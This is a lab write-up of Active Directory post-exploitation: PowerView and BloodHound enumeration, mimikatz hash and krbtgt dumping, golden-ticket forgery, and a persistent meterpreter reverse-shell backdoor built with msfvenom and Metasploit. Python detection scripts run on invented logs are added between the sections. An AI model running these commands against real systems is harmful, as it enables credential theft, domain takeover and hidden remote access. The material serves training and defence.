Post-Exploitation Basics In Active Directory Environment By Hashar Mujahid

Hashar Mujahid, published in InfoSec Write-ups · 9 min read · Aug 5, 2022

Learn the basics of post-exploitation and maintaining access with mimikatz, bloodhound, Powerview, and msfvenom.

Introduction:

This room teaches you how to enumerate inside an Active Directory environment after you have gained initial access. It covers post-exploitation enumeration with PowerView and BloodHound, dumping hashes and golden ticket attacks with mimikatz, and basic information gathering using Windows Server tools and logs.

Enumeration w/ Powerview:

In this task, we are going to learn how to use PowerView.ps1 to enumerate the target machine.

SSH into the target machine.

Step 1:

You need to start PowerShell with the execution policy bypassed so you can run scripts easily.

You can do this with the -ep flag:

powershell -ep bypass

If you want to learn more about PowerShell execution policies, you can watch this great video by John Hammond.

Execute the PowerView.ps1 script in the Downloads directory.

PowerView.ps1

Now you can run commands to enumerate the users on the machine.

There is a great cheat sheet to help you enumerate easily.

Enumerate the domain users by running the Get-NetUser command. Beware: this can print a lot of information that is hard to parse through, so we can pipe the output and retrieve only the fields we need, such as cn and description.

Get-NetUser | select cn, description
Get-NetUser | select samaccountname, description, pwdlastset, logoncount, badpwdcount # basic user info

Kerberoastable users:

You can find the Kerberoastable users by adding the -SPN switch, which filters for accounts that have a Service Principal Name set.

Kerberoastable users

Enumerate the domain groups:

We can enumerate the domain groups by running the “Get-NetGroup” command. This can also output a lot of information. You can just pipe the output and retrieve what is useful to you.

All Groups.

Woah! That is a lot of groups. We can narrow them down by retrieving only the ones with the word “admin” in their name.

Get-NetGroup -GroupName *admin*

Now we can move over to the next part of this room.

Enumeration w/ Bloodhound:

BloodHound is a graphical interface that allows you to visually map out the network. This tool, along with SharpHound, which is similar to PowerView, takes the users, groups, trusts, etc. of the network and collects them into .json files to be used inside BloodHound.

We'll be focusing on how to collect the .json files and how to import them into BloodHound.

BloodHound Installation -

1.) apt-get install bloodhound

2.) neo4j console - default credentials -> neo4j:neo4j

Getting Loot Information.

First, you need to bypass the execution policy of PowerShell so you can run the scripts easily.

powershell -ep bypass

After that, dot-source sharphound.ps1:

. .\sharphound.ps1

After that, you need to run Invoke-BloodHound to collect all the information.

BloodHound

If you get the incompatible collector error in BloodHound, make sure to download the latest version of SharpHound.ps1 and run it again.

We can see that a loot.zip file has been created; let's transfer it to our attacking machine.

Mapping the network w/ BloodHound -

1.) bloodhound (run this on your attacker machine, not the victim machine)

2.) Sign In using the same credentials you set with Neo4j

After that, upload the loot file using the Upload Data button.

After that, you can analyze the output.

BloodHound
Kerberoastable Users
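
Everything in the two sections above (the execution policy bypass, the PowerView cmdlets and the SharpHound collection) leaves traces in Windows logs when command-line auditing (Event 4688) and PowerShell script block logging (Event 4104) are enabled. The following Python script is an added example, not part of the original room or of PowerView/BloodHound: it runs a few simple rules over constructed log records and groups the hits per host and user so the whole enumeration chain is visible. The record layout, host names, users and rule thresholds are assumptions made for this example.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample records modelled on two Windows log sources:
#   4688 (Security: process creation, with command-line auditing enabled)
#   4104 (Microsoft-Windows-PowerShell/Operational: script block logging)
# None of this is real telemetry; hosts, users and commands are made up.
SAMPLE_EVENTS = [
    {"id": 4688, "host": "DC01", "user": "CORP\\alice",
     "command": "powershell -ep bypass"},
    {"id": 4688, "host": "DC01", "user": "CORP\\svc_backup",
     "command": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"id": 4104, "host": "DC01", "user": "CORP\\alice",
     "script": "Get-NetUser | select cn, description"},
    {"id": 4104, "host": "DC01", "user": "CORP\\alice",
     "script": "Get-NetUser -SPN | select samaccountname, serviceprincipalname"},
    {"id": 4104, "host": "DC01", "user": "CORP\\alice",
     "script": "Get-NetGroup -GroupName *admin*"},
    {"id": 4104, "host": "DC01", "user": "CORP\\alice",
     "script": "Invoke-BloodHound -CollectionMethod All -ZipFileName loot.zip"},
    {"id": 4104, "host": "WS07", "user": "CORP\\bob",
     "script": "Get-ChildItem C:\\Users\\bob\\Documents"},
]

# Matches "-ep bypass" as well as "-ExecutionPolicy Bypass" (PowerShell accepts prefixes).
EP_BYPASS = re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.IGNORECASE)
# Cmdlet names exported by PowerView (older Net* and newer Domain* naming).
POWERVIEW_CMDLETS = ("Get-NetUser", "Get-NetGroup", "Get-NetComputer",
                     "Get-DomainUser", "Get-DomainGroup", "Get-DomainComputer")
SHARPHOUND_TOKENS = ("Invoke-BloodHound", "SharpHound")


@dataclass
class Finding:
    host: str
    user: str
    rule: str
    severity: str
    evidence: str


def analyze(events):
    """Return one Finding per suspicious event; benign events produce nothing."""
    findings = []
    for ev in events:
        if ev["id"] == 4688 and EP_BYPASS.search(ev["command"]):
            # Execution policy is not a security boundary, so bypassing it is only a
            # weak signal on its own; it matters when combined with the rules below.
            findings.append(Finding(ev["host"], ev["user"], "execution-policy-bypass",
                                    "low", ev["command"]))
        elif ev["id"] == 4104:
            text = ev["script"].lower()
            hits = [c for c in POWERVIEW_CMDLETS if c.lower() in text]
            if hits:
                # Asking specifically for SPN-bearing accounts is Kerberoasting preparation.
                severity = "high" if "-spn" in text else "medium"
                findings.append(Finding(ev["host"], ev["user"], "powerview-enumeration",
                                        severity, ", ".join(hits)))
            if any(tok.lower() in text for tok in SHARPHOUND_TOKENS):
                findings.append(Finding(ev["host"], ev["user"], "sharphound-collection",
                                        "high", ev["script"]))
    return findings


def summarize(findings):
    """Group rules by (host, user) so an analyst sees the chain, not isolated events."""
    chains = defaultdict(set)
    for f in findings:
        chains[(f.host, f.user)].add(f.rule)
    return {key: sorted(rules) for key, rules in chains.items()}


if __name__ == "__main__":
    found = analyze(SAMPLE_EVENTS)
    for f in found:
        print(f"[{f.severity:6}] {f.host} {f.user}: {f.rule} ({f.evidence})")
    for (host, user), rules in summarize(found).items():
        print(f"{host}/{user}: {' -> '.join(rules)}")
```

The execution policy bypass alone is noisy (the svc_backup record shows a scheduled script doing the same thing), which is why the summary step matters: one user on a domain controller bypassing the policy, then running Get-NetUser -SPN and Invoke-BloodHound in the same session, is a far stronger signal than any single event.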

Off to the next part.

Dumping hashes w/ mimikatz:

Mimikatz is a very popular and powerful post-exploitation tool, mainly used for dumping user credentials inside an Active Directory network.

We’ll be focusing on dumping the NTLM hashes with mimikatz and then cracking those hashes using hashcat.

Step 1: Run mimikatz:

mimikatz.exe

Step 2: privilege::debug. Ensure that the output is "Privilege '20' ok"; this confirms that you're running mimikatz as an administrator. If you don't run mimikatz as an administrator, it will not work properly.

Privilege

Step 3: lsadump::lsa /patch dumps the hashes from the SAM file.

Lsa-Dump
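
mimikatz gets those hashes by opening a handle to lsass.exe with memory-read rights, which Sysmon records as Event ID 10 (ProcessAccess). The script below is an added detection example, not from the room or from mimikatz, that scores constructed Sysmon 10 records: it ignores query-only handles, checks the source process against an assumed baseline, and raises the severity when the source lives in a user-writable path or the call trace contains unbacked memory. The baseline list, the sample records and the call traces are assumptions made for this example.

```python
import re
from dataclasses import dataclass, field

# Access-mask bits from the Win32 process rights (OpenProcess documentation).
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
MEMORY_RIGHTS = PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE

# Assumed per-environment baseline of processes that legitimately open lsass with
# memory rights (core OS, Defender, your EDR). Tune this list to your own fleet.
BASELINE_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}
USER_WRITABLE = re.compile(r"\\users\\|\\temp\\|\\programdata\\")

LSASS = r"C:\Windows\System32\lsass.exe"
# Constructed Sysmon Event ID 10 records; the field names follow Sysmon, the values
# and call traces are made up for this example.
SAMPLE_EVENTS = [
    {"SourceImage": r"C:\Windows\System32\svchost.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1000", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d2e4"},
    {"SourceImage": r"C:\Users\Administrator\Downloads\mimikatz.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d2e4|C:\Users\Administrator\Downloads\mimikatz.exe+3a1b0"},
    {"SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1fffff", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d2e4"},
    {"SourceImage": r"C:\Windows\System32\Taskmgr.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1400", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d2e4"},
    {"SourceImage": r"C:\Windows\System32\WerFault.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1fffff", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d2e4"},
    {"SourceImage": r"C:\Users\bob\AppData\Local\Temp\svc.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1fffff",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d2e4|UNKNOWN(00000000024F1234)"},
    {"SourceImage": r"C:\Users\bob\Downloads\tool.exe", "TargetImage": r"C:\Windows\explorer.exe",
     "GrantedAccess": "0x1fffff", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d2e4"},
]


@dataclass
class Finding:
    source: str
    granted_access: str
    severity: str
    reasons: list = field(default_factory=list)


def score_event(ev):
    """Return a Finding for a suspicious lsass handle, or None for a benign one."""
    if not ev["TargetImage"].lower().endswith(r"\lsass.exe"):
        return None
    access = int(ev["GrantedAccess"], 16)
    if not access & MEMORY_RIGHTS:
        return None  # query-only handles (e.g. 0x1400 from Task Manager) are routine
    src = ev["SourceImage"].lower()
    reasons = []
    if src not in BASELINE_SOURCES:
        reasons.append("source not in lsass-access baseline")
    if USER_WRITABLE.search(src):
        reasons.append("source runs from a user-writable path")
    if "unknown(" in ev.get("CallTrace", "").lower():
        reasons.append("call trace includes unbacked (injected) memory")
    if not reasons:
        return None
    severity = "high" if len(reasons) >= 2 else "medium"
    return Finding(ev["SourceImage"], ev["GrantedAccess"], severity, reasons)


def hunt(events):
    return [f for f in (score_event(ev) for ev in events) if f is not None]


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.source} access={f.granted_access}: {'; '.join(f.reasons)}")
```

The WerFault.exe hit is deliberately left as a medium: a crash dump of lsass is rare but legitimate, and the right fix is to decide per environment whether it belongs in the baseline rather than to suppress the rule.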

Now copy those hashes and try to crack them with hashcat.

Syntax: hashcat -m 1000 <hash> rockyou.txt
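
hashcat mode 1000 is NTLM, i.e. the NT hash: MD4 over the UTF-16LE encoding of the password, with no salt and no work factor. That is why dictionary attacks against it are so fast, and it is also why a defender can audit a hash dump offline. The Python below is an added example, not part of the room or of hashcat: it implements MD4 directly (so it runs on Python builds whose hashlib lacks md4), derives NT hashes, and checks a constructed dump against a banned-password list and for password reuse across accounts. The account names, passwords and banned list are made up for the example; the hashes for "password" and for the empty password are the well-known values.

```python
import struct
from collections import defaultdict

MASK32 = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(message: bytes) -> bytes:
    """MD4 per RFC 1320, written out here because hashlib's md4 is missing on
    OpenSSL 3 builds that do not load the legacy provider."""
    bit_length = (len(message) * 8) & 0xFFFFFFFFFFFFFFFF
    msg = message + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", bit_length)

    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    order2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    order3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)

    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        # Each step rewrites one register; rotating the tuple walks through a, d, c, b.
        for i in range(16):
            a, b, c, d = d, _rotl((a + f(b, c, d) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):
            a, b, c, d = d, _rotl((a + g(b, c, d) + x[order2[i]] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):
            a, b, c, d = d, _rotl((a + h(b, c, d) + x[order3[i]] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4]), b, c
        a0, b0, c0, d0 = (a0 + a) & MASK32, (b0 + b) & MASK32, (c0 + c) & MASK32, (d0 + d) & MASK32
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE password; no salt, no iterations."""
    return md4(password.encode("utf-16-le")).hex()


# Constructed "dump" for the audit. Two entries are the well-known hashes of "password"
# and of an empty password; the others are computed here from made-up passwords.
DUMPED_HASHES = {
    "Administrator": "8846F7EAEE8FB117AD06BDD830B7586C",
    "svc-backup": nt_hash("Autumn2022!"),
    "svc-sql": nt_hash("Autumn2022!"),
    "guest": "31D6CFE0D16AE931B73C59D7E0C089C0",
    "jdoe": nt_hash("c0rrect-h0rse-battery-staple-9"),
}
WEAK_PASSWORDS = ["password", "Password1", "Welcome1", "", "Summer2022!"]


def audit(dumped, weak_passwords):
    """Flag accounts whose NT hash matches a banned password, and accounts sharing a hash."""
    banned = {nt_hash(p): p for p in weak_passwords}  # hash each candidate once, not per account
    weak = {user: banned[h.lower()] for user, h in dumped.items() if h.lower() in banned}
    by_hash = defaultdict(list)
    for user, h in dumped.items():
        by_hash[h.lower()].append(user)
    # Unsalted hashes mean identical passwords give identical hashes, so reuse is visible
    # without ever recovering the password itself.
    reused = {h: users for h, users in by_hash.items() if len(users) > 1}
    return {"weak": weak, "reused": reused}


if __name__ == "__main__":
    report = audit(DUMPED_HASHES, WEAK_PASSWORDS)
    for user, pw in report["weak"].items():
        print(f"weak password on {user}: {pw!r}")
    for h, users in report["reused"].items():
        print(f"hash {h} shared by {', '.join(users)}")
```

The reuse check is the part hashcat does not give you directly: svc-backup and svc-sql share a password that is not on the banned list, so a cracking run might never surface it, yet the identical hashes already prove that compromising one account compromises both.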

Golden Ticket Attacks w/ mimikatz:

A successful Golden Ticket attack gives the hacker access to an organization’s entire Active Directory domain.

Golden Ticket attacks take advantage of a vulnerability in the Kerberos authentication protocol, which Microsoft has been using as its default authentication protocol ever since Windows 2000.

If you want to learn more about how the Golden Ticket attack works, there is a great blog here.

In summary, hackers bypass the KDC and create TGTs themselves to get access to various resources.

There are some requirements for this attack to be successful:

Fully Qualified Domain Name.

SID (Security Identifier) of the domain.

Username of the account they want to impersonate.

KRBTGT password hash.

Step 1: Dump the krbtgt Hash

We can use mimikatz to retrieve the hash and security identifier (SID) of the krbtgt account.

lsadump::lsa /inject /name:krbtgt

This dumps the hash and security identifier of the Kerberos Ticket Granting Ticket (krbtgt) account, allowing you to create a golden ticket.

KRBTGT HASH DUMP

Take note of the bolded information in the image.

Step 2: Create a Golden Ticket:

We can easily create a golden ticket using mimikatz. A detailed walkthrough of the whole process is at

In summary, after gathering the prerequisites you need to run the following command:

kerberos::golden /user: /domain: /sid: /krbtgt: /id:

Note: you may need to change “/krbtgt:” to “/rc4:”. If you encounter any errors, follow this official guide.

Step 3: Use the Golden Ticket to access another machine:

misc::cmd - This will open a new command prompt with elevated privileges to all machines.

Access other Machines! — You will now have another command prompt with access to all other machines on the network

Unfortunately, because TryHackMe does not currently support networks, you will be unable to access other machines; however, I encourage you to add other machines to this domain controller yourself and try out these attacks.
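
Both the Kerberoastable accounts from earlier (the ones with SPNs) and a forged TGT leave a footprint in the domain controller's Security log. The following Python is an added example, not part of the room or of mimikatz, that applies two classic heuristics to constructed 4768/4769/4770 records: a service ticket request (4769) for an account and client that the KDC never issued or renewed a TGT for within the maximum ticket lifetime, which is what a golden ticket looks like because the TGT was minted offline; and several RC4-encrypted (0x17) service ticket requests for different SPNs from one client in a short window, which is what Kerberoasting looks like. The record layout, the 10-hour lifetime and the thresholds are assumptions made for this example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

TGT_MAX_LIFETIME = timedelta(hours=10)   # default "Maximum lifetime for user ticket"
KERBEROAST_WINDOW = timedelta(minutes=5)
KERBEROAST_MIN_SERVICES = 3
RC4_HMAC = 0x17                           # TicketEncryptionType value for RC4

# Constructed Security-log records (4768 TGT requested, 4769 service ticket requested,
# 4770 ticket renewed). Accounts, hosts and times are invented for the example.
EVENTS = [
    {"time": "2022-08-05T08:00:00", "id": 4768, "account": "alice", "client": "10.0.0.5",
     "service": "krbtgt/CORP.LOCAL", "enc": 0x12},
    {"time": "2022-08-05T08:01:00", "id": 4769, "account": "alice@CORP.LOCAL", "client": "10.0.0.5",
     "service": "cifs/FS01.corp.local", "enc": 0x12},
    {"time": "2022-08-05T09:00:00", "id": 4769, "account": "Administrator@CORP.LOCAL", "client": "10.0.0.99",
     "service": "cifs/DC01.corp.local", "enc": 0x12},
    {"time": "2022-08-05T09:05:00", "id": 4768, "account": "mallory", "client": "10.0.0.7",
     "service": "krbtgt/CORP.LOCAL", "enc": 0x12},
    {"time": "2022-08-05T09:06:00", "id": 4769, "account": "mallory@CORP.LOCAL", "client": "10.0.0.7",
     "service": "MSSQLSvc/SQL01.corp.local:1433", "enc": 0x17},
    {"time": "2022-08-05T09:06:05", "id": 4769, "account": "mallory@CORP.LOCAL", "client": "10.0.0.7",
     "service": "HTTP/WEB01.corp.local", "enc": 0x17},
    {"time": "2022-08-05T09:06:10", "id": 4769, "account": "mallory@CORP.LOCAL", "client": "10.0.0.7",
     "service": "cifs/FS01.corp.local", "enc": 0x17},
    {"time": "2022-08-05T18:30:00", "id": 4770, "account": "alice", "client": "10.0.0.5",
     "service": "krbtgt/CORP.LOCAL", "enc": 0x12},
    {"time": "2022-08-05T20:00:00", "id": 4769, "account": "alice@CORP.LOCAL", "client": "10.0.0.5",
     "service": "ldap/DC01.corp.local", "enc": 0x12},
]


def _key(ev):
    # 4769 records carry "user@REALM"; normalise so 4768/4769/4770 compare equal.
    return ev["account"].split("@")[0].lower(), ev["client"]


def detect(events):
    events = sorted(events, key=lambda e: e["time"])
    last_tgt = {}                      # (account, client) -> time of last 4768/4770 seen
    rc4_requests = defaultdict(list)   # (account, client) -> [(time, service)]
    already_flagged = set()
    findings = []
    for ev in events:
        t = datetime.fromisoformat(ev["time"])
        key = _key(ev)
        if ev["id"] in (4768, 4770):
            last_tgt[key] = t
            continue
        if ev["id"] != 4769:
            continue
        issued = last_tgt.get(key)
        if issued is None or t - issued > TGT_MAX_LIFETIME:
            # The KDC never issued (or renewed) a TGT for this account from this client,
            # yet one was presented: the forged-TGT (golden ticket) signature.
            findings.append({"rule": "tgs-without-valid-tgt", "account": key[0],
                             "client": key[1], "time": ev["time"]})
        if ev["enc"] == RC4_HMAC and not ev["service"].lower().startswith("krbtgt/"):
            rc4_requests[key].append((t, ev["service"]))
            recent = {svc for ts, svc in rc4_requests[key] if t - ts <= KERBEROAST_WINDOW}
            if len(recent) >= KERBEROAST_MIN_SERVICES and key not in already_flagged:
                already_flagged.add(key)
                findings.append({"rule": "kerberoasting", "account": key[0],
                                 "client": key[1], "time": ev["time"],
                                 "services": sorted(recent)})
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f)
```

The renewal event (4770) is included on purpose: without it, alice's legitimate 20:00 request would be flagged because her TGT from 08:00 is past the 10-hour lifetime, which is the most common false positive of this rule. In production you would also need to merge logs from every DC, since the 4768 and the matching 4769 may be served by different ones.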

Enumeration w/ Server Manager:

In this task, we are going to get information using the built-in Windows Server Manager.

Because servers are rarely logged on to except for maintenance, you can easily enumerate them using nothing but built-in Windows tools such as Server Manager. If you already have domain admin, Server Manager gives you a lot of access: you can change trusts, add or remove users, and look at groups, and it can be an entry point to find other users on the domain with access to other networks, in order to pivot to another network and continue your testing.

The only way to access Server Manager is to RDP into the machine.

On Linux you can use xfreerdp to connect to the target:

xfreerdp /v:<IP-ADD> /u:Administrator /p:'P@$$W0rd'

When you first launch Windows Server Manager, it will look like this. The most interesting tabs are Tools and Manage. The Tools tab contains the majority of your information, such as users, groups, trusts, and machines. The Manage tab lets you add roles and features, but this will most likely be noticed by a systems administrator rather quickly.

Don’t be concerned with the AD CS, AD DS, DNS, or File and Storage Services; these are designed for Active Directory exploitation and aren’t really useful for post-exploitation.

server manager UI

Navigate to the tools tab and select the Active Directory Users and Computers.

Active Directory Users and Computers
Sql user

Maintaining Access:

There are numerous methods for retaining access to a machine or network. We will cover a relatively simple one: first set up a meterpreter shell, then use the persistence Metasploit module to create a backdoor service on the system that gives us an instant meterpreter shell again if the machine is ever shut down or reset.

Other methods of sustaining access, such as sophisticated backdoors and rootkits, are also available but are outside the scope of this room.

This will take a little more manual setup than the other tasks, so prior knowledge of msfvenom and Metasploit is recommended.

Step 1: Generating a Payload w/ msfvenom:

1. msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o shell.exe

This will generate a basic Windows meterpreter reverse TCP shell.

msfvenom

2. Transfer the payload from your attacker machine to the target machine.

http server

You can use certutil or the Invoke-WebRequest command to fetch the file on the target.

Certutil

3. use exploit/multi/handler - this will create a listener on the port that you set.

4. Configure the payload to be a Windows meterpreter shell: set payload windows/meterpreter/reverse_tcp

5. After setting your THM IP address as LHOST, start the listener with run.

6. Executing the binary on the Windows machine will give you a meterpreter shell back on your host — let’s return to that.

7. Verify that we’ve got a meterpreter shell, then background it to run the persistence module.

Meterpreter Configuration
SESSION

Run the Persistence Module:

1. use exploit/windows/local/persistence - this module will send a payload every 10 seconds by default; however, you can set this interval to anything you want.

2. set session 1 - set the session to the one that we backgrounded in meterpreter (you can use the sessions command in Metasploit to list the active sessions).

You will lose your meterpreter session if the system is shut down or reset for any reason. By using the persistence module, however, you create a backdoor into the system that you can reach at any time: start the Metasploit multi handler, set the payload to windows/meterpreter/reverse_tcp, and the machine will send another meterpreter payload back and open a new meterpreter session.
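
The persistence module's default 10-second delay (and any similar callback schedule) shows up on the network as connections with almost no variance in their spacing, regardless of the port or payload. The Python below is an added beacon-detection example, not part of the room or of Metasploit: it groups constructed connection records by source, destination and port, computes the inter-arrival times, and flags groups whose timing is too regular to be a person. The flow layout, the thresholds and the addresses are assumptions made for this example.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

MIN_CONNECTIONS = 6   # enough samples to judge periodicity
MAX_JITTER = 0.2      # coefficient of variation (stdev / mean) below which timing is machine-like

# Constructed connection records, as a firewall or NetFlow export might give them.
# 10.0.0.12 -> 10.10.14.3:4444 fires every ~10 s; the 443 traffic is ordinary browsing;
# the 53 traffic has too few samples to judge.
FLOWS = [
    ("2022-08-05T12:00:00.000", "10.0.0.12", "10.10.14.3", 4444),
    ("2022-08-05T12:00:10.200", "10.0.0.12", "10.10.14.3", 4444),
    ("2022-08-05T12:00:20.100", "10.0.0.12", "10.10.14.3", 4444),
    ("2022-08-05T12:00:29.900", "10.0.0.12", "10.10.14.3", 4444),
    ("2022-08-05T12:00:40.000", "10.0.0.12", "10.10.14.3", 4444),
    ("2022-08-05T12:00:50.300", "10.0.0.12", "10.10.14.3", 4444),
    ("2022-08-05T12:01:00.100", "10.0.0.12", "10.10.14.3", 4444),
    ("2022-08-05T12:00:03.000", "10.0.0.12", "203.0.113.10", 443),
    ("2022-08-05T12:00:04.000", "10.0.0.12", "203.0.113.10", 443),
    ("2022-08-05T12:00:31.000", "10.0.0.12", "203.0.113.10", 443),
    ("2022-08-05T12:02:10.000", "10.0.0.12", "203.0.113.10", 443),
    ("2022-08-05T12:02:11.000", "10.0.0.12", "203.0.113.10", 443),
    ("2022-08-05T12:05:00.000", "10.0.0.12", "203.0.113.10", 443),
    ("2022-08-05T12:00:07.000", "10.0.0.20", "10.0.0.1", 53),
    ("2022-08-05T12:00:08.000", "10.0.0.20", "10.0.0.1", 53),
    ("2022-08-05T12:00:09.000", "10.0.0.20", "10.0.0.1", 53),
]


def profile(flows):
    """Per (src, dst, dport): connection count, mean inter-arrival gap and its jitter."""
    buckets = defaultdict(list)
    for ts, src, dst, dport in flows:
        buckets[(src, dst, dport)].append(datetime.fromisoformat(ts))
    stats = {}
    for key, times in buckets.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if len(gaps) < 2:
            stats[key] = {"count": len(times), "mean_gap": None, "jitter": None}
            continue
        m = mean(gaps)
        # Coefficient of variation: a scheduled callback has a tiny value, human traffic a large one.
        stats[key] = {"count": len(times), "mean_gap": m, "jitter": pstdev(gaps) / m if m else None}
    return stats


def find_beacons(flows):
    """Return the (src, dst, dport) tuples whose timing looks scheduled rather than human."""
    return [key for key, s in profile(flows).items()
            if s["count"] >= MIN_CONNECTIONS and s["jitter"] is not None and s["jitter"] < MAX_JITTER]


if __name__ == "__main__":
    for key, s in profile(FLOWS).items():
        print(key, s)
    print("beacons:", find_beacons(FLOWS))
```

Real callbacks usually add random jitter, so in practice the threshold is tuned per environment and combined with other context (rare destination, unusual port, a process that should not talk to the internet); the structure of the check stays the same.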

See y’all later.

Happy Hacking!
